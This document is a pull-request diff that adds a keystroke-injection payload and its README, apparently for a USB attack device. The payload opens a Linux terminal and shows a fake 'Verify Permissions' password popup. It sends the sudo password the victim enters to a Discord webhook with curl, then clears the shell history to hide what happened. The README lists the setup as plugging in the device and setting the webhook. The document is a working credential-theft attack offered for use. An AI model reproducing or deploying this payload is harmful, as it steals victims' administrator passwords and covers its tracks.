Merge pull request #154 from aleff-github/patch-21

Exfiltrate Sudo Password By Phishing

payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/README.md

@@ -0,0 +1,26 @@
+ 
+# Exfiltrate Sudo Password By Phishing - Linux ✅
+
+A script used to exfiltrate the sudo password by a popup phishing based on linux systems.
+
+**Category**: Credentials, Phishing
+
+## Description
+
+A script used to exfiltrate the sudo password by a popup phishing based on linux systems.
+
+Opens a shell, get the password by a popup, send the input to a Discord webhook.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set the Discord webhook

payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/payload.txt

@@ -0,0 +1,28 @@
+REM #######################################################
+REM #                                                     |
+REM # Title        : Exfiltrate Sudo Password By Phishing |
+REM # Author       : Aleff                                |
+REM # Version      : 1.0                                  |
+REM # Category     : Credentials, Phishing                |
+REM # Target       : Linux                                |
+REM #                                                     |
+REM #######################################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Discord webhook
+
+REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
+DEFINE #WEBHOOK example.com
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+REM #### POPUP SECTION ####
+STRINGLN WEBHOOK_URL="#WEBHOOK"
+DELAY 500
+
+REM All-in-one is important 
+STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --password "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
+ENTER